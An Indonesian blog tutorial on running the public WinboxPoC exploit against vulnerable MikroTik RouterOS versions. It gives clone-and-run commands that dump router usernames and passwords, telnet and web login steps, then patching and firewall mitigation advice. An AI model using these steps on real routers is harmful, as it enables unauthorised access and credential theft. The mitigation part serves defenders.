Search

MikroTik RouterOS "Proof of Concept of Winbox Critical Vulnerability" Tested On GNU/Linux

GhostGTR666 12:48 AM

Assalamualaikum Wr.Wb...
dengan diberikan nikmat dan rezeki dari Allah SWT, saya Mr.GagalTotal666 akan
berbagi kepada anda yaitu exploitasi MikroTik RouterOS
"Proof of Concept of Winbox Critical Vulnerability" Tested On GNU/Linux.

setelah mendengar kabar buming exploit mikrotik router os ini sangat lah cepat
banyak yang mencoba dan menguji nya, di tutorial kali ini hanya sebatas
menguji saja jika anda menggunakan nya mensalah gunakan
saya tidak bertanggung jawab itu resiko anda sendiri
kepada pihak yang berwajib tetapi sudah ada
fix penutup bug nya juga kok tenang aja

exploit yang akan di pakai yaitu WinboxPoc
mikrotik yang retan yaitu di versi dari 6.29 (tanggal rilis: 2015/28/05)
hingga 6.42 (tanggal rilis 2018/04/20) rentan ..

oke langsung saja simak sebagai berikut

buka terminal/console anda
sebelum mengeksekusi pastikan di linux anda sudah ada paket python 3
karena winboxpoc di compile dari bahasa pemrograman python 3

unduh winboxpoc di github [disni]
update winboxpoc new [disini]
atau anda bisa lewat terminal/console

$ git clone https://github.com/gagaltotal/WinboxPoC

masuk ke directory WinboxPoC

$ cd WinboxPoC

sebelum mengeksusi mikrotik nya pastikan anda sudah terkoneksi

$ python3 PoC.py (alamat IP router anda)
$ python3 PoC.py 192.168.21.1


bom password dan user dapat dan anda bisa login melalu telnet dan port web 80

contoh login di telnet

$ telnet hostname
$ telnet 192.168.21.1


kalau port telnet nya disable kamu tidak bisa mengakses remote telnet
biasa nya pada mikrotik untuk setting port berada di letak > IP > service
cari port 23 tcp yaitu telnet dan enable

contoh login address port 80

$ 192.168.21.1


oke mungkin cukup yah ^_^, nah sekarang cara untuk menutup bug nya
bagaiaman sih cara nya agar router kita tidak terkena keretanan exploit ini ?

menurut dari berbagai sumber dengan teknik migrasi nya seperti ini

- Perbarui RouterOS Anda ke versi terakhir atau versi Bugfix
- Jangan gunakan Winbox dan nonaktifkan
- Anda dapat menggunakan beberapa Aturan Filter (ACL) untuk menolak
akses anonim ke Router
- dan ubah ip firewall seperti ini
ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop

simak video sebagai berikut


oke mungkin itu saja mengenai keretanan pada mikrotik
mohon maaf jika ada kesalahan dan kekurangan nya

NB : JANGAN DI PAKAI UNTUK KEGIATAN YANG MENYALAHGUNAKAN
BAGI SESEORANG

sekian dan semoga bermanfaat....

Wasalamualaikum Wr.Wb...
Tags

Post a Comment

3 Comments

  1. batra tinar tamaFebruary 21, 2020 at 6:10 PM

    Traceback (most recent call last):
    File "PoC.py", line 43, in
    s.connect((ip, 8291))
    ConnectionRefusedError: [Errno 111] Connection refused
    mohon bantuanya bang?

    ReplyDelete
    Replies
    1. GhostGTR666March 17, 2020 at 2:02 PM

      itu versi 1.0 update ke versi baru tools exploit winboxpoc nya,
      https://github.com/BasuCert/WinboxPoC

      Delete
    2. GhostGTR666March 17, 2020 at 2:07 PM

      banyak bug, tapi kalau masih traceback connect refused
      coba kamu ikuti langkah dan penjelasan dari saya di atas

      Delete

Emoji
(y)
:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
x-)
(k)